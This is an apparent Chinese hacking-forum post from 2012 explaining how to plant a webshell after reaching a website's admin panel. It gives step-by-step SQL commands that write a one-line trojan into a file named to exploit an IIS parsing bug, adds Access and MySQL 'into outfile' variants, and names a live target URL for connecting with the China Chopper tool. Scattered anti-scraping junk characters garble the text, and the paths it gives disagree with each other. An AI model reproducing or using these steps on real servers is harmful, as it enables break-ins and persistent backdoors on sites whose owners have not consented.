好不容易进了后台,发现啥上传啊。备份啊多木有。
* f1 B8 `; P4 c* jwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
+ @4 W# h, k2 E3 ?) F* p文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,; U9 c; b% U5 \! X/ {
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:" C& S5 h6 |4 R q1 G* O! r
1.create table cmd (a varchar(50))
+ W$ Z0 Z& y" J5 T0 j1 E( n4 h2.insert into cmd (a) values (‘‘)& N3 o( I. n) z0 w- |* n" ~8 @9 H
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
$ D/ f5 K/ d/ S6 [(把表cmd的内容导出为物理路径的一个EXCEL文件)+ }1 q( _4 D7 J" P: t+ k# z, E
4.drop table cmd
( v1 c/ Q9 v0 ~: w* ]9 v: `3 a0 R8 N利用IIS的BUG成功拿到了WEBSHELL。
$ {* ]" s- f$ x: }) R) [# R( E- X! P
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
0 E3 m" N4 ^; i8 L* s) Y7 F' L* t5 ]# ]% o' N9 T
SQL语句意思解释:/ H" k+ g# E9 K
第一句5 Y0 }2 \) U8 I3 t R9 @2 D3 X4 ?
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
$ c& ?" m8 V, E6 L: U& [+ ]# r6 O( R& V
第二句) u7 v, m" I+ ^4 Q
在表cmd的a字段插入一句话木马, v6 q/ a5 K& w/ F+ T* N. G
第三句
7 a7 f9 o0 p' p4 P1 C9 ^ 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件+ W8 t8 u/ L3 B5 T2 @( ~
9 |: [4 }. b5 q& n
第四句& C. |8 k! P/ ?/ C5 S
删除建立的cmd表
$ i S+ y; A2 d/ n
6 L6 e( M; ~ x- b) u6 y* K2 @ 以下内容为测试:. u7 p+ S: U( c. c) s: H6 o+ i
Access利用后台SQL执行命令功能导出WebShell:
2 W' Y: j$ K |/ m/ j 这个更简单:3 K, Z- a: p7 V) O# d! l
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]% j: ^. q( Y6 ]( R% R& u1 @: l `) f& G
或者
3 O4 ?8 |9 y8 s7 T$ n7 J [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]2 m" H$ B/ v5 T, \
" S) a/ Z i# f6 i2 _2 {
后台有执行SQL语句功能(vote为已知表段)
3 e$ h$ z& t( F- ^, V6 K! m 希望对大家有所帮助拿shell的又一个思路1 @ a! F/ ^; _
|
发表于 2012-9-13 17:53:58
收藏
支持
反对